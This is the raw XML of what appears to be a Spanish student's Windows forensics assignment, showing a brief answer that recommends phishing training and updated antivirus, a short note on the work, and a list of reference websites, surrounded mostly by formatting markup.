        <w:t>¿qué salvaguardas llevarías a cabo para reducir el riesgo de volver a sufrir un incidente similar? Indica al menos dos salvaguardas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4749C" w14:textId="7E5FEEC0" w:rsidR="000A3E5D" w:rsidRDefault="00382E0B" w:rsidP="002F5B4D">
      <w:r>
        <w:t>Siguiendo los puntos anteriores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20128EE6" w14:textId="77777777" w:rsidR="00440909" w:rsidRDefault="00382E0B" w:rsidP="00382E0B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Formar a los empleados en temas de </w:t>
      </w:r>
      <w:r w:rsidR="00440909">
        <w:t>phishing y protocolos de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415733EF" w14:textId="26652299" w:rsidR="00382E0B" w:rsidRPr="00382E0B" w:rsidRDefault="00440909" w:rsidP="00382E0B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tener los anti virus actualizados y ejecutándose siempre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FCC07" w14:textId="30AFF717" w:rsidR="00133920" w:rsidRDefault="00133920" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A6FF7A" w14:textId="46A3C828" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14428265" w14:textId="56912AB1" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1FA584" w14:textId="77777777" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CB25ED" w14:textId="247AF4ED" w:rsidR="00133920" w:rsidRDefault="00133920" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C12FD72" w14:textId="50EB6B34" w:rsidR="00133920" w:rsidRPr="00382E0B" w:rsidRDefault="00133920" w:rsidP="002F5B4D">
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Notas:</w:t>
      </w:r>
      <w:r w:rsidR="00382E0B" w:rsidRPr="00382E0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00382E0B">
        <w:t>La parte del secret</w:t>
      </w:r>
      <w:r w:rsidR="00440909">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00382E0B">
        <w:t xml:space="preserve"> de la felicidad me ha resultado muy tediosa, ya que me atasqué mucho tiempo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1DA39" w14:textId="1E6A4E0C" w:rsidR="00133920" w:rsidRDefault="00133920" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Webs utilizadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40D1DD" w14:textId="033EBA09" w:rsidR="00133920" w:rsidRDefault="00133920" w:rsidP="00133920">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://elhacker.info/manuales/An%C3%A1lisis%20de%20malware/Introduccion-a-la-informatica-forense-en-Windows.pdf?utm_source=chatgpt.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03C0C31B" w14:textId="6BFF385E" w:rsidR="00133920" w:rsidRDefault="00696AB1" w:rsidP="00133920">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://webdiis.unizar.es/~ricardo/files/TFMs/Analisis-Forense-Sistemas-Windows_TFM_VIU.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D2C4151" w14:textId="1B1AFE30" w:rsidR="00691423" w:rsidRDefault="00691423" w:rsidP="00382E0B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://tecnocratica.net/wikicratica/books/windows/page/ver-reglas-de-firewall-desde-powershell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7596272A" w14:textId="3C041F2F" w:rsidR="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="00382E0B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00092DF0">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.welivesecurity.com/es/recursos-herramientas/extension-de-un-archivo-cabeceras/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71F87650" w14:textId="77777777" w:rsidR="00382E0B" w:rsidRPr="00382E0B" w:rsidRDefault="00382E0B" w:rsidP="00382E0B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00382E0B" w:rsidRPr="00382E0B" w:rsidSect="002A23D7">
      <w:footerReference w:type="default" r:id="rId6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0B336" w14:textId="77777777" w:rsidR="0074049F" w:rsidRDefault="0074049F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="402FDBC3" w14:textId="77777777" w:rsidR="0074049F" w:rsidRDefault="0074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7404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9423E" w14:textId="77777777" w:rsidR="0074049F" w:rsidRDefault="0074049F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5952A170" w14:textId="77777777" w:rsidR="0074049F" w:rsidRDefault="00740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0FC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7354CC9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1B1D36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C322BD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35210"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F828C486"/>
    <w:lvl w:ilvl="0" w:tplc="D9587FF2">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7"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2313AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753E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9D7181"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753E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758DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37A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F6268"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42D4113C"/>
    <w:lvl w:ilvl="0" w:tplc="29FAEA04">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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34CE7EB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753E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A686F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B70830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CD49E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E36E909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B9D02F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753E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FDD4680"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="753E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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="1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31876"/>
    <w:rsid w:val="00057EBB"/>
    <w:rsid w:val="000A3E5D"/>
    <w:rsid w:val="000B787E"/>
    <w:rsid w:val="00133920"/>
    <w:rsid w:val="0014220F"/>
    <w:rsid w:val="00227A5A"/>
    <w:rsid w:val="00261507"/>
    <w:rsid w:val="002A14EB"/>
    <w:rsid w:val="002F5B4D"/>
    <w:rsid w:val="00382E0B"/>
    <w:rsid w:val="003C7B53"/>
    <w:rsid w:val="003E29B4"/>
    <w:rsid w:val="004206DD"/>
    <w:rsid w:val="00440909"/>
    <w:rsid w:val="004C1E26"/>
    <w:rsid w:val="00517A25"/>
    <w:rsid w:val="00571E5A"/>
    <w:rsid w:val="006046C8"/>
    <w:rsid w:val="006348D6"/>
    <w:rsid w:val="00691423"/>
    <w:rsid w:val="00696AB1"/>
    <w:rsid w:val="006A1DA2"/>
    <w:rsid w:val="00702864"/>
    <w:rsid w:val="00733DD9"/>
    <w:rsid w:val="0074049F"/>
    <w:rsid w:val="007520B2"/>
    <w:rsid w:val="00797E58"/>
    <w:rsid w:val="007C36FB"/>
    <w:rsid w:val="007F645A"/>
    <w:rsid w:val="0084442C"/>
    <w:rsid w:val="0088791C"/>
    <w:rsid w:val="008A6A54"/>
    <w:rsid w:val="008A71F8"/>
    <w:rsid w:val="00935841"/>
    <w:rsid w:val="009B4BC4"/>
    <w:rsid w:val="009F7434"/>
    <w:rsid w:val="00A22550"/>
    <w:rsid w:val="00A56114"/>
    <w:rsid w:val="00A908D4"/>
    <w:rsid w:val="00B63374"/>
    <w:rsid w:val="00B747F1"/>
    <w:rsid w:val="00BA0A75"/>
    <w:rsid w:val="00C858EA"/>
    <w:rsid w:val="00CC32D9"/>
    <w:rsid w:val="00CC51F6"/>
    <w:rsid w:val="00CF199F"/>
    <w:rsid w:val="00D53C88"/>
    <w:rsid w:val="00D71001"/>
    <w:rsid w:val="00D84404"/>
    <w:rsid w:val="00D86E37"/>
    <w:rsid w:val="00E422E7"/>
    <w:rsid w:val="00ED1049"/>
    <w:rsid w:val="00EE3DFE"/>
    <w:rsid w:val="00EE776F"/>
    <w:rsid w:val="00EF181B"/>
    <w:rsid w:val="00FB69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styleId="nfasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000A3E5D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="license">
    <w:name w:val="license"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="000A3E5D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sep">
    <w:name w:val="sep"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="000A3E5D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A3E5D"/>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0A3E5D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloCar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="000A3E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E5D"/>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uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA0A75"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00133920"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002615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1507"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C858EA"/>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864683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="918758573">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="9476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4413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1154250825">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="120"/>
          <w:marBottom w:val="120"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1769275543">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190414792">
              <w:marLeft w:val="240"/>
              <w:marRight w:val="240"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="240"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1373267891">
              <w:marLeft w:val="240"/>
              <w:marRight w:val="240"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="240"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="587542733">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="545456219">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="179005281">
                          <w:marLeft w:val="48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15776025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="182681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drive.google.com/drive/folders/1nRHOlRtU7WVa-osNGMczrwGscZzFUQSC?usp=shari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webdiis.unizar.es/~ricardo/files/TFMs/Analisis-Forense-Sistemas-Windows_TFM_VIU.pdf"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ntfs.com/gif-signature-format.htm" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tecnocratica.net/wikicratica/books/windows/page/ver-reglas-de-firewall-desde-powershell"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hyperlink" Target="https://elhacker.info/manuales/An%C3%A1lisis%20de%20malware/Introduccion-a-la-informatica-forense-en-Windows.pdf?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/publicdomain/zero/1.0/deed.es" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/es/recursos-herramientas/extension-de-un-archivo-cabeceras/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/es/recursos-herramientas/extension-de-un-archivo-cabecera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2FA36-4C38-4357-8E3D-66574459C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1</Pages>
  <Words>3045</Words>
  <Characters>16750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35</cp:revision>
  <cp:lastPrinted>2026-01-12T03:29:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T18:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-12T03:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>